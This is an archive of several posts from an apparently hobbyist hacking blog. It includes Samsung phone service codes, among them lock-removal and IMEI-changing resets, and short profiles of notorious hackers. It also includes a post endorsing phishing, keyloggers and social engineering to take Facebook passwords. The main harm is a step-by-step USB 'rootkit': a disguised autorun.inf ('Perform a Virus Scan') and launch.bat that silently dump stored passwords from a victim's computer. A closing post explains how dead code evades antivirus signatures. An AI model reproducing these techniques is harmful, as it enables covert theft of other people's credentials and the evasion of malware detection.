Pages

Saturday, December 31, 2011

Samsung Mobile Secret Codes



You can try these in case you downloaded corrupted or incompatible Java midlets or other media, which are causing problems with the phone.
*2767*JAVA# Java Reset and (Deletes all Java Midlets)
*2767*MEDIA# Reset Media (Deletes All Sounds and Pics)
*2767*WAP# Wap Reset
*2767*CUST# Reset Custom EEPR0M
*2767*FULL# Reset Full EEPR0M (Caution)
For example : *2767*JAVA# would be keyed in as *2767*5282#
Note : Not all codes will work with SGH-C100.


Other Samsung Codes
*#06# IMEI code
*#9998*4357# Help Menu
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On




SAMSUNG T100 SECRET CODES
============================
*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters


*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)


*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version




SAMSUNG V200 SECRET CODES


v200 Unlock Code-> *2767*7822573738#
*#9324# Netmon (press the hangup key to exit)
*#9998*JAVA# Edit GPRS/ CSD settings (S100 Only)
*#9998*Help# Help screen/ List of codes
*#9998*LOGO# Change operator Logo
*#9998*RTC# RTC Display
*#9998*Bat# Battery Status
*#9998*Buz# Turns Buzzer ON
*#9998*Vib# Turns Vibrator ON
*#9998*LCD# LCD Contrast
*#9998*9999# Softwre Version
*#9998*8888# Hardware Version
*#9998*377# NVM Error Log (?????)
*#9998*NET# SIM Network ID
*#9998*778# SIM Serv. Table
*#9998*SIM# SIM Info
*#9998*PN# Production No.
*#9998*968# Reminder Tune
*#9998*NVM# Displays Non-Volitile Memory Status
*#9999*C# ???????????????????
*#06# Displays phones I**I No.
***/// ***/// NOTE /// *** RED COLOR , they appear serious !!! Use at
own risk !!!
*#9998*2576# Forces SIM Error
*#9998*DEAD# Forces Phone Crash
*2767*MEDIA# Resets the medis on the phone (deletes all downloaded
pics/tones)
*2767*FULL# Resets the EEPRON *DANGEROUS*
*2767*CUST# Resets the Custom EEPRON
*2767*JAVA# Resets JAV downloads (deletes all downloaded midlits)
*2767*STACKRESET# Resets Stack
*2767*225RESET# ????????????????? * Dangerous *
*2767*WAP# Resets WAP Setting & Deletes Favorites


SAMSUNG A800 SECRET CODES


The universal unlock code is *2767*637# do this with out your sim in
By default, the firmware (software) for x600 only receives java
apps and other applications like stuff by serial port.
but even for it, you have to enable the serial port, which also
causes
the closing of all other ports, even the IrDA too :-( ..
well, guess what, i have very good news for you,
do you know, you can increase the sound level,
the sound level for tones, speaker fone, etc,
can be increase even then if it is at max (level 4)
you still can do it,
just follows the instructions!


**************** HERE WE GO **************
Enter the following code:
*#8999*8378#
(You'll be shown menu, then ...)
then go to:
"H/W test"
then go to:
"Audio Settings"


then go to:
"Melody Gain"


There will you see a number.
there are five (5) Melody Levels" of it.
(and currently, you are at level 1 and after
pressing the "save" button, you will move to
level 2 and so on .........................)
you have to change the values of all the levels.
and as the resultant, it will give increase the
melody sound!, your tones will more louder,
even more louder then the max. ringing volume.
the level wise numbers are: (as its my setting :-) )


Melody Level 1: 13
Melody Level 2: 17
Melody Level 3: 18
Melody Level 4: 25
Melody Level 5: 31
you even can make your own combinations of level wise
sounding numbers that can change the sound level!.


if your combination cause more louder sound level,
then mine,
then do share it with the group! ... :-)
meanwhile, try my figured-out combination!


************ CAUTION ************
if anything goes wrong,
then you can apply the master reset code,
that will NOT delete anything, ANYTHING from your
cell fone, but set each and eveything to its
default/standard setting ...
(likes, factory settings :-) )
the master reset code is:
#*7728#


#########################################
I take no responsibility of these codes are working or not,
or its effects on your cell fone
but i have tried these codes on my cell fone.
and i bet, nothing goes wrong,
but even then of my words, be carefull!,
#########################################
The code: *#8999*8378#
as i regarded it a informative code,
will tell you each and everything about your cell fone.
and in the "H/W test",
there are lot of other Audio settings,
each of them having five (5) levels,
you can change the combination, but before doing anything,
do write the defult number sequence to some place so that
you'll be then able to invert it again! .. :-) ...
#*2558# - Time ON
#*2527# - GPRS Switching Set to class {4/8/9/10}
#*4263# - Handsfree Mode: ACTIVATED
#*53696# - [Java dnload] WAPSAR mode
#*536961# - WAPSAR enable HTTP disable
#*536962# - HTTP enable WAPSAR disable
#*536963# - SERIAL enable Others disable
#*5663351# - [Phone Model] SAMSUNG SGH-X100
#*6420# - Mic off
#*6421# - Mic on
#*7632# - Sleep mode
*#8999*523# - Main LCD Brightness
*#8999*3825523# - (?) External display
*2767*3855# - Full EEPROM reset(Reset all type of locks)also you'll
lose pictures and java not melody
Remove camera sound:
On main screen type:
*#8999*8378# --> Test mode
H/W test
Audio Settings
Melody Gain
Then replace 6 by 0, it'll show 12 but it's OK
Press back until main screen
Then press key volume to minimum and let's try !!! no more sound
tip by C-Quest


*2767*688# resets the phone
Thats all!!!!!!!!!!!!!!!
Samsung X100 Tricks


#*0000#
#*0400#
#*1200# - AFC DAC Val
#*1300# - IMEI
#*1400# - IMSI
#*1700# - ( ) Command #*1700 Executed
#*1800# - ( ) Command #*1800 Executed
#*1900# - ( ) Command #*1900 Executed
#*2000# - ( ) Command #*2000 Executed
#*2100# - ( ) Command #*2100 Executed
#*2200# - ( ) Command #*2200 Executed
#*2252# - Current CAL
#*2255# -
#*2256# - Calibr.-Info
#*2282#
#*2285#
#*2286# - Databattery
#*2337# - ( ) Permanent Registration - Not Yet Implemented
#*2355#
#*2400# - ( ) Command #*2400 Executed
#*2474# - For CMD Set - DEBUGBATTERY in cihard.opt
#*2527# - GPRS Switching Set to class {4/8/9/10}
#*2558# - Time ON
#*2562#
#*2565#
#*2677# - AMR State: {None / Full Rate}
#*2679# - Copycat Feature: {ACTIVATED/DEACTIVATED}
#*2787# - CRTP {ON/OFF}
#*2834# - Audio path Mobile Normal
#*2836# - AVDDSS Management: {DEACTIVATED/ACTIVATED}
#*3230# - Trace Enable DCD disable
#*3231# - Trace disable DCD Enable
#*3232# - Current Mode {Trace enabled/DCD enabled}
#*3270# - DCS Support: {DEACTIVATED/ACTIVATED}
#*3282# - Data: {DEACTIVATED/ACTIVATED}
#*3333#
#*3353# - General Defence Code Erased
#*3370#
#*3377#
#*3476# - EGSM: {DEACTIVATED/ACTIVATED}
#*3676# - Flash Volume Formated
#*3683#
#*3737# - Some Codes
#*3777#
#*3779#
#*3825# - ( ) Command #*3825 Executed
#*3837#
#*3849#
#*3851#
#*3876#
#*3877# - Dump of SPY Trace
#*3900#
#*3940# - External looptest 9600 bps not available in SYSOL2
#*3940# - External looptest 115200 bps not available in SYSOL2
#*3941#
#*4200#
#*4263# - Handsfree Mode: ACTIVATED
#*4300#
#*4500#
#*4674# - IMSI MCC:2 5 0 MNC 9 2 10 11 91 83 50
#*4700# - Half Rate: {ACTIVATED/DEACTIVATED}
#*4760# - GSM: {ACTIVATED/DEACTIVATED}
#*4864#
#*5100#
#*5111# - ( ) Some Codes
#*5132#
#*5133# - ( ) Some Codes
#*5143#
#*5156#
#*5165#
#*5171# - ( ) Some Codes
#*5172# - ( ) Some Codes
#*5173# - ( ) Some Codes
#*5174#
#*5175#
#*5176# - ( ) Some Codes
#*5177#
#*5187# - L1C2G trace: {ACTIVATED/DEACTIVATED}
#*53696# - [Java dnload] WAPSAR mode
#*536961# - WAPSAR enable HTTP disable
#*536962# - HTTP enable WAPSAR disable
#*536963# - SERIAL enable Others disable
#*5376#
#*5400# - ( ) Command #*5400 Executed
#*5500#
#*5600#
#*566335# - [WAP model ID]
#*5663351# - [Phone Model] SAMSUNG SGH-X100
#*5663352# - [Java Model] SEC-SGHS300/1.0
#*5737425# - Java Serial
#*577699# - APN
#*5800# - ( ) Command #*5800 Executed
#*6100# - ( ) Command #*6100 Executed
#*6200#
#*6420# - Mic off
#*6421# - Mic on
#*6422# - Mic dep RXdata
#*6428# - Mic measurement
#*6700#
#*6837# - Official Software Version
#*6900#
#*7200#
#*7222# - Operation Typ: Class C GSM
#*7224# - ERROR
#*7247#
#*7252# - Operation Typ: Class B GPRS
#*7271# - Multi slot: Class 1 GPRS
#*7274# - Multi slot: Class 4 GPRS
#*7276#
#*7284# - Class B
#*7287# - GPRS Attached
#*7288# - GPRS Detached
#*7326# - Accessory: Vibrator
#*7337# - Some kind of Reset Settings
#*7352# - Some Kind of Debug Info
#*7462# - SIM phase
#*7524# - KCGPRS
#*7562# - LOCI GPRS
#*7636#
#*7639#
#*7632# - Sleep mode
#*7633#
#*7638# - RLC always open ended TBF: {ACTIVATED/DEACTIVATED}
#*7646#
#*7665#
#*7666# - SrCell Data
#*7673# - Sleep mode
#*7676# - Command #*7676 Executed
#*7683# - Sleep variable
#*7693# - Sleep deact
#*7728# - RSAV done->reset
#*7763# - SMS bearer CS {ACTIVATED/DEACTIVATED}
#*7825#
#*7828# - Midl Rl51
#*7957# - Command #*7957 Executed
#*7983# - Voltage/Freq {DEACTIVATED/ACTIVATED}
#*7986# - Voltage {DEACTIVATED/ACTIVATED}
#*8462# - Sleep time since SwitchOff
#*8465# - Time in L1
#*8466# - Old Time
#*8645#
#*9278# - Command #*9278 Executed
#*9795# - wtls key: reset
#7263867# - RAM Dump {On/Off}
#7465625*228# - Activa lock deactivated
#7465625*27*
#7465625*2827# - Auto CP lock deactivated
#7465625*28638# - Auto Network lock deactivated
#7465625*28746# - Auto SIM lock deactivated
#7465625*2877# - Auto SP lock deactivated
#7465625*28782# - Auto subset lock deactivated
#7465625*638*
#7465625*746*
#7465625*77*
#7465625*782*
#8999*324#
*#0*
*#0020# –
*#06# – IMEI
*#2255# - Call List
*#4777*8665# – GPRS
*#7465625# – Interrogate ( )
*#8377466# – Software && Hardware Versions
*#8888# – Hardware Version
*#8999*324# - ( ) Some Strange Numbers
*#8999*377# -
*#8999*3825523# - ( )
*#8999*523# - Main LCD Brightness
*#8999*636# - ( ) Another Strange Numbers
*#8999*8376363# - . HW, SW, + Some Code And Data
*#8999*8378# - . , , , HW SW
*#9999# – Software Version


=== : ===


*2767*xx927 - WAP . xx - . , xx=44: *2767*44WAP# xx=31: *2767*31WAP#


*2767*xx667 - MMS.


.


*2767*2877368#
*2767*2878# – EEPROM ( , )
*2767*31667#
*2767*31927#
*2767*33667#
*2767*33927#
*2767*34667#
*2767*34927#
*2767*351667#
*2767*351927#
*2767*3700#
*2767*380667#
*2767*380927#
*2767*3855# - l EEPROM ( SP- !! ) IMEI 447967-89-400044-0, IMEI ( )
*2767*39667#
*2767*39927#
*2767*420667#
*2767*420927#
*2767*43667#
*2767*43927#
*2767*44667#
*2767*44927#
*2767*46667#
*2767*46927#
*2767*49667#
*2767*49927#
*2767*66335#
*2767*688# ( ) [Unlocking Code]
*2767*7100#
*2767*7300#
*2767*73738927# = *2767*RESETWAP#
*2767*7650#
*2767*7667#
*2767*7927#
*2767*8200#
*2767*927#


=== / : ===


*335#
*663867# - mm file dumped
*7465625# -
*7465625*228# - Activa lock personalized
*7465625*27*
*7465625*2827# - Auto CP lock activated
*7465625*28638# - Auto Network lock activated
*7465625*28746# - Auto SIM lock activated
*7465625*2877# - Auto SP lock activated
*7465625*28782# - Auto subset lock activated
*7465625*638*
*7465625*746
*7465625*746*
*7465625*77*
*7465625*782*








Secret Codes


*#06# -> Show IMEI
*#9999# -> Show Software Version
*#0837# -> Show Software Version (instructions)
*#0001# -> Show Serial Parameters
*#9125# -> Activates the smiley when charging.


*#9998*228# -> Battery status (capacity, voltage, temperature)
*#9998*246# -> Program status
*#9998*289# -> Change Alarm Buzzer Frequency
*#9998*324# -> Debug screens
*#9998*364# -> Watchdog
*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
*#9998*427# -> Trace Watchdog
*#9998*523# -> Change LCD contrast - Only with version G60RL01W
*#9998*544# -> Jig detect
*#9998*636# -> Memory status
*#9998*746# -> SIM File Size
*#9998*778# -> SIM Service Table
*#9998*785# -> RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error. *#9998*786# -> Run, Last UP, Last DOWN
*#9998*837# -> Software Version
*#9998*842# -> Test Vibrator - Flash the screenligth during 10 seconds and vibration activated.
*#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected
*#9998*872# -> Diag
*#9998*947# -> Reset On Fatal Error
*#9998*999# -> Last/Chk


*#9998*9266# -> Yann debug screen (=Debug Screens?)
*#9998*9999# -> Software version


*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown


SP-unlock SGH-600 and SGH 2100


*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!! )
But also changes IMEI to 447967-89-400044-0, To restore your old IMEI use the IMEI program found on the software page.


*2767*2878# -> Custom EEEPROM Reset


Hope you like this much as i like much when i written.....

Friday, December 30, 2011

World’s Top 5 Black Hat Hackers of All Time

What can hackers do to our PC? Are they really can break our security? The portrayal of hackers in the media has ranged from the high-tech super-spy, as in Mission Impossible where Ethan Hunt repels from the ceiling to hack the CIA computer system and steal the “NOC list,” to the lonely anti-social teen who is simply looking for entertainment.


***Black Hat Hackers***


A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transferences to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.


1 ) Jonathan James



A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transferences to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended,”The code itself was crappy . . . certainly not worth $1.7 million like they claimed.”


2 ) Adrian Lamo



Adrian Lamo around computers as a very young child. He had a Commodore 64 when he was like 6 or so. And his first interest in seeing how things worked behind the scenes wasn’t all about technology necessarily, and his interest in what you might call hacking isn’t really primarily about technology…He saids” It’s not sexy when I’m exploring less obvious aspects of the world that don’t involve multibillion-dollar corporations. There’s a certain amount of tunnel vision there.”Last year, Lamo earned the disapproval of his probation officer in the closing months of his two year probation term when he refused to provide a blood sample for the FBI’s DNA database.  The  Combined DNA Index System, or CODIS, was created to catalog violent criminals and sexual predators, but the 2004 Justice for All Act expanded the system to include samples from all newly convicted federal felons, including drug offenders and white-collar criminals.

3 ) Kevin Mitnick


Kevin David Mitnick (born August 6, 1963) is a computer security consultant and author. In the late 20th century, he was convicted of various computer- and communications-related crimes. At the time of his arrest, he was world-famous as the most-wanted computer criminal in the United States.Mitnick gained unauthorized access to his first computer network in 1979, at 16, when a friend gave him the phone number for the Ark, the computer system Digital Equipment Corporation (DEC) used for developing their RSTS/E operating system software. He broke into DEC’s computer network and copied DEC’s software, a crime he was charged with and convicted of in 1988. He was sentenced to 12 months in prison followed by three years of supervised release. Near the end of his supervised release, Mitnick hacked into Pacific Bell voice mail computers.

After a warrant was issued for his arrest, Mitnick fled, becoming a fugitive for two and a half years.  According to the U.S. Department of Justice, Mitnick gained unauthorized access to dozens of computer networks while he was a fugitive. He used cloned cellular phones to hide his location and, among other things, copied valuable proprietary software from some of the country’s largest cellular telephone and computer companies. Mitnick also intercepted and stole computer passwords, altered computer networks, and broke into and read private e-mail. Mitnick was apprehended in February 1995 in North Carolina. He was found with cloned cellular phones, more than 100 clone cellular phone codes, and multiple pieces of false identification.

4 ) Kevin Poulsen




Kevin Poulsen was among the most accomplished, multi-talented hackers. He worked for SRI International by day, and hacked at night under the handle “Dark Dante”. He trained to be the complete hacker, and even taught himself lock picking.Among other things, Poulsen reactivated old Yellow Page escort telephone numbers for an acquaintance that then ran a virtual agency. When the FBI started pursuing Poulsen, he went underground as a fugitive. When he was featured on NBC’s Unsolved Mysteries, the show’s 1-800 telephone lines mysteriously crashed. He was finally arrested in February, 1995.

Poulsen’s best known hack was a takeover of all of the telephone lines for Los Angeles radio station KIIS-FM, guaranteeing that he would be the 102nd caller, and winning a Porsche 944 S2.  In June 1994, Poulsen pleaded guilty to seven counts of mail, wire and computer fraud, money laundering, and obstruction of justice, and was sentenced to 51 months in prison and ordered to pay $56,000 in restitution. It was the longest sentence ever given for hacking up to that time. He also later pleaded guilty to breaking into computers and obtaining information on undercover businesses run by the FBI.


5 ) Robert Tappan Morris



Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.  Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500.

Thursday, December 29, 2011

4 ways on How to hack facebook password



Today i thought to uncover all the methods used to hack facebook password,


I will cover 4 methods over here:



1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack


Facebook phishing:I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. 


Keylogging:This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.


Social engineering:This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


Primary email address hack:If Facebook hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this Facebook hacker can easily hack your Facebook password using "Forgot password" trick. He will simply ask Facebook to send password reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will be hacked !!!




So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email addressSo far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.







Wednesday, December 28, 2011

Hack Stored Passwords in PC Using USB Pen Drive

Hacking passwords or any information using USB pendrive. Learn how to steal information or passwords of your friends or enemies using pendrives...



Today I will show you how to hack Passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.


Webbrowserpassview: WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 8.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.


Download Above Tools From  Here


Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.


1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB 
    Pendrive.

     ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe,webbrowserpassview.exe and       
     passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it


[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

3.New Text Document.txt to autorun.inf

4.Now copy the autorun.inf file onto your USB pendrive.

5.Create another Notepad and write the following text onto it.

        start mspass.exe /stext mspass.txt

        start mailpv.exe /stext mailpv.txt

        start iepv.exe /stext iepv.txt

        start pspv.exe /stext pspv.txt

         start webbrowserpassview.exe /stext webpass.txt

         start passwordfox.exe /stext passwordfox.txt

6.save the Notepad and rename it from New Text Document.txt to launch.bat

7.Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps


8. Insert the pendrive in victim pc and the autorun window will pop-up. (This is because, we have 
    created an autorun pendrive). if pop-up window might not open then you should manually  
    click on launch.bat file to run the all tools silently..

9. In the pop-up window, select the first option (Perform a Virus Scan).

10. Now all the password recovery tools will silently get executed in the background (This process 
      takes hardly a few seconds). The passwords get stored in the .TXT files.

11. Remove the pendrive and plug in it in your pc now you can see the .TXT files in usb drive just      
      open that and you can see the password.....

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How does Anti-virus software works....


Hello friends, today i will explain you all how an antivirus software works and detects virus. Most of you already know that what is antivirus, but have you ever tried to understand how it works and why it requires updates regularly? How antivirus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of antivirus involves two basic technologies namely:


1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

So friends, lets start learning how an antivirus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, antivirus software searches a string by comparing the file with strings existing in virus definition's or database.

 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behaviour of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does antivirus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the antivirus database so it is not detected by antivirus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why antivirus needs updates regularly. Antivirus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with keyloggers and spy trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:

The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that antivirus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then antivirus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your antivirus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains backdoors that make your system open for attack similar to the way you have left your house main gate open for theifs in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted freewares as alternatives for paid tools rather than using their cracked versions...

I hope you all have liked it.... If you have any queries ask me in form of comments...